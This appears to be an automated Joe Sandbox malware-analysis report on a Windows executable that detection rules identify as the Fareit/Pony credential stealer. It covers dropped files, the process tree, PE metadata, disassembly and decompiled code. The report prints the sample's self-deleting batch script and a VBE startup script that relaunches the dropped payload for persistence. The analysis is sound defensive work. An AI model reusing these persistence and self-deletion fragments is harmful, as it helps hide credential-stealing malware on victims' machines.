https://www.google.com/gws_rd=ssl	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://www.google.com/searchLMEM	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	false		high
https://consent.google.com/set?pc=s&uxe=4421591B	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/ocid=iehp	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://consent.google.com/setpc=s&uxe=4421591W	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	false		high
https://consent.google.com/set?pc=s&uxe=4421591=	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	499220
Start date:	08.10.2021
Start time:	05:18:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@16/4@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 84.4% (good quality ratio 83.3%) Quality average: 90.2% Quality standard deviation: 19.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 187 Number of non-executed functions: 113
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.127.240.158, 20.49.150.241, 20.82.210.154, 95.100.218.79, 104.94.89.6, 20.50.102.62, 20.54.110.249, 40.112.88.60, 8.247.248.223, 8.247.248.249, 8.247.244.249 Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, settingsfd-geo.trafficmanager.net, e11290.dspg.akamaiedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:19:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\12537875.bat Download File
Process:	C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	3.233204299824007
Encrypted:	false
SSDEEP:	3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
MD5:	3880EEB1C736D853EB13B44898B718AB
SHA1:	4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
SHA-256:	936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
SHA-512:	3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

C:\Users\user\AppData\Local\Temp\12556453.bat Download File
Process:	C:\Users\user\AppData\Roaming\Adnexal8.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	3.233204299824007
Encrypted:	false
SSDEEP:	3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
MD5:	3880EEB1C736D853EB13B44898B718AB
SHA1:	4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
SHA-256:	936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
SHA-512:	3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

C:\Users\user\AppData\Roaming\Adnexal8.exe Download File
Process:	C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	6.863912238907148
Encrypted:	false
SSDEEP:	3072:dzTpvZP5c5VcVkyIqSq3FZ/CPvBUk+2icuOHBSKwVLkIPbxWL:dzTpTcfktVZ/eBJFhuIoKWc
MD5:	CEA30515CD73B348562CA2ABE1E4D47C
SHA1:	992044BCEB5EFCDE49D301ADE4009821416E2F14
SHA-256:	D100E2DEEDEE23CAAFD62A4818E09A817C5D8541873735043D3660D01EE3189A
SHA-512:	D2F58477D9F54BDF333D38180E6EEBDDD3AF527D48539B6EF4E64357A9ED47DB1BCF6051EBD28953B4D29A01482644F6212E248B4CE52535861542D2B4ABFA33
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 73%, Browse Antivirus: ReversingLabs, Detection: 90%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B............4.......................Rich............PE..L...~..Y..................................... ....@.........................................................................t...(...........................................................................(... ....................................text...L........................... ..`.data...H.... ....... ..............@....rsrc................0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe Download File
Process:	C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	384
Entropy (8bit):	2.6619394252288306
Encrypted:	false
SSDEEP:	3:j+qAHmFEm86oQ/FERMQsNC2xAvOt+kiEaKC5dgdLHBHLHrLL:j+q9Nht6GzwknaZ5dM
MD5:	F40096CD6C6B446A9B937443895ED424
SHA1:	6B3E5F5521DFF346F98755F8AFA5EAF905670034
SHA-256:	D61FFAE8EBE85E8D7F9C137D3432CF3D50490A1B600F511612476F6B39F1BEAA
SHA-512:	D26CF75FFADF0F15D6D0B88F09BC74067E640D390C48567882DD00B317CE2634AA0600C2D27D41C072D2C1758B11C1AEFABF06368BBB583E91A48ACD67B40253
Malicious:	false
Reputation:	low
Preview:	Set objShell = CreateObject("Shell.Application")..objShell.ShellExecute "C:\Users\user\AppData\Roaming\Adnexal8." & "exe", "", "", "", 1.......................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.863909587118569
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
File size:	147456
MD5:	3087b67577a90aa611436c94ed23ae5a
SHA1:	6a84f2dd65787b2f9041421357c9939c63dd796d
SHA256:	2cec15c8fef9435abd5c332486d8ad7083eeb9eb84de9077b5bf6bb42458dba5
SHA512:	f962d8c030c0185ba33e2a9ebeda782a8b794307712b408a9966a679cabc457cd79b65ce06e5608788cf7011d0f14d31dd53dd9eef5dbb846b5960f5211d72cc
SSDEEP:	3072:IzTpvZP5c5VcVkyIqSq3FZ/CPvBUk+2icuOHBSKwVLkIPbxWu:IzTpTcfktVZ/eBJFhuIoKWc
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........B............4.......................Rich............PE..L...}..Y..................................... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401188
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x59D68C7D [Thu Oct 5 19:48:13 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	864db8a731b1823c994bef60988e95f0

Entrypoint Preview

Instruction
push 00401398h
call 00007FC3D0C0AD75h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esp+ecx*8], al
and dl, cl
in al, C4h
fisttp word ptr [eax-7Ch]
add ecx, ebp
adc dword ptr [ecx+00000009h], edx
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
push ebx
je 00007FC3D0C0ADF4h
imul ebp, dword ptr [ebx+76h], 31657261h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add eax, 1C9B36F1h
add eax, B944E58Dh
pop eax
dec eax
adc al, 4Dh
cmc
sbb al, 16h
dec dword ptr [ebx+08h]
arpl di, si
mov eax, 178E482Dh
push edi
in eax, dx
lahf
xchg eax, esp
mov edi, dword ptr [esi+3Ah]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec edi
add dword ptr [eax], eax
add byte ptr [ebx+00h], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [ecx+72h], al
jne 00007FC3D0C0ADE9h
imul esp, dword ptr [ebp+72h], 010D0073h
push es
add byte ptr [eax+65h], cl
jc 00007FC3D0C0ADE6h
jnc 00007FC3D0C0ADB2h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x21a74	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2b000	0x9a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x94	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20d4c	0x21000	False	0.798783735795	data	7.22855725445	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x8848	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2b000	0x9a0	0x1000	False	0.1884765625	data	2.14548366324	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2b870	0x130	data
RT_ICON	0x2b588	0x2e8	data
RT_ICON	0x2b460	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x2b430	0x30	data
RT_VERSION	0x2b150	0x2e0	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Trns6
InternalName	Tohndiges5
FileVersion	1.08.0002
CompanyName	loGitech
LegalTrademarks	Rentegner0
ProductName	Doglpperne7
ProductVersion	1.08.0002
FileDescription	Taphanen3
OriginalFilename	Tohndiges5.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012 Parent PID: 6480

General

Start time:	05:19:01
Start date:	08/10/2021
Path:	C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	3087B67577A90AA611436C94ED23AE5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, Author: Joe Security Rule: pony, Description: Identify Pony, Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low

Chronological Activities

Analysis Process: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060 Parent PID: 7012

General

Start time:	05:19:03
Start date:	08/10/2021
Path:	C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	3087B67577A90AA611436C94ED23AE5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: pony, Description: Identify Pony, Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: pony, Description: Identify Pony, Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 5040 Parent PID: 7060

General

Start time:	05:19:06
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' '
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1316 Parent PID: 5040

General

Start time:	05:19:07
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wscript.exe PID: 3184 Parent PID: 3424

General

Start time:	05:19:15
Start date:	08/10/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe'
Imagebase:	0x7ff75cb50000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Adnexal8.exe PID: 5600 Parent PID: 3184

General

Start time:	05:19:16
Start date:	08/10/2021
Path:	C:\Users\user\AppData\Roaming\Adnexal8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Adnexal8.exe'
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	CEA30515CD73B348562CA2ABE1E4D47C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Author: Joe Security Rule: pony, Description: Identify Pony, Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 73%, Metadefender, Browse Detection: 90%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Adnexal8.exe PID: 6892 Parent PID: 5600

General

Start time:	05:19:21
Start date:	08/10/2021
Path:	C:\Users\user\AppData\Roaming\Adnexal8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Adnexal8.exe'
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	CEA30515CD73B348562CA2ABE1E4D47C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: pony, Description: Identify Pony, Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Fareit, Description: Yara detected Fareit stealer, Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: pony, Description: Identify Pony, Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4540 Parent PID: 6892

General

Start time:	05:19:25
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' '
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4600 Parent PID: 4540

General

Start time:	05:19:25
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012 Parent PID: 6480 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCOMMON

Executed Functions

Function 04B41491, Relevance: 1.6, APIs: 1, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?,04B40233,00000000,00000000,00000000,00000000,00000000,00000100), ref: 04B414D4

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 68f1300b4169501a5149b5bf366d46f158dcaf459f2b63602d3b4dfb240e3762
Instruction ID: f25ec0e19e2d2b89887ae7cbb20b25812d888f0047aebd1c895d6cb9c596f3c3
Opcode Fuzzy Hash: 68f1300b4169501a5149b5bf366d46f158dcaf459f2b63602d3b4dfb240e3762
Instruction Fuzzy Hash: 62314CB1D143419FDB24CF2CD8C8B65B7A0EB85224F04C2E9D5A68B2E7C234E481DB26

Uniqueness

Uniqueness Score: -1.00%

Function 04B40A06, Relevance: 1.6, APIs: 1, Instructions: 68nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(00000000,?), ref: 04B40A15

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 614cbf790dd754109b8ca54cbfdcb230ac824af459207037d42871c7b1f4fd19
Instruction ID: 2825a5fef7da350e570dd683a7aee0dc461c6267f60794ac4052b00e2c57514e
Opcode Fuzzy Hash: 614cbf790dd754109b8ca54cbfdcb230ac824af459207037d42871c7b1f4fd19
Instruction Fuzzy Hash: DA11C821904245AFDB15BF78C54C6A97B75FFC2304F1496D5D562060A2DB20B983FB51

Uniqueness

Uniqueness Score: -1.00%

Function 04B41197, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 963a09184f9f20adaa2f6bb100399d5f92b43a481d01f298c1781eeb9e4b5093
Instruction ID: b79bf0daa7b395fd2c74f65ddc56addb1344f22f5f0daf82d0761349cbe124fc
Opcode Fuzzy Hash: 963a09184f9f20adaa2f6bb100399d5f92b43a481d01f298c1781eeb9e4b5093
Instruction Fuzzy Hash: EC012872951210DFEB20CF49CDC4E26B7E8FF88660F4984A9E9549B612C378FC90CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0041C2B3, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0041C2B3(void* __eax, void* __ebx, void* __esi) {
				void* _t16;
				void* _t18;
				signed char _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr* _t24;
				void* _t25;
				void* _t28;
				int _t37;
				int _t39;
				signed int _t40;
				int _t41;
				void* _t46;
				void* _t49;
				char* _t50;
				signed int _t51;
				signed int _t55;
				void* _t62;

				_pop(_t41);
				_t37 = _t41;
				_push(0);
				_push(0);
				_push(0);
				 *_t50 = 0x48;
				asm("paddw xmm2, xmm1");
				 *(_t50 + 1) = 0x65;
				_push(__eax);
				_pop(_t16);
				 *((char*)(_t50 + 2)) = 0x61;
				 *((char*)(_t50 + 3)) = 0x70;
				_t18 = _t16;
				 *((char*)(_t50 + 4)) = 0x43;
				 *((char*)(_t50 + 5)) = 0x72;
				_t20 = _t18;
				 *((char*)(_t50 + 6)) = 0x65;
				 *((char*)(_t50 + 7)) = 0x61;
				_push(__esi);
				_pop(_t46);
				 *((char*)(_t50 + 8)) = 0x74;
				_t51 = _t50 + 1;
				_t21 = _t20 & 0x00000008;
				if(_t21 == 0) {
					asm("cld");
					_pop(ds);
					 *_t21 = _t21 +  *_t21;
					__eflags =  *_t21;
					_t22 = memcpy(_t21, _t46, _t37);
					_t51 = _t51 + 0xc;
					_t41 = _t46 + _t37 + _t37;
					_t39 = _t37;
					do {
						_t22 = E0041C3C0(_t22, _t39, _t46, 0);
					} while (__eflags >= 0);
					goto __eax;
				}
				_t55 = _t21 << 1;
				 *((char*)(_t51 + 9)) = 0x65;
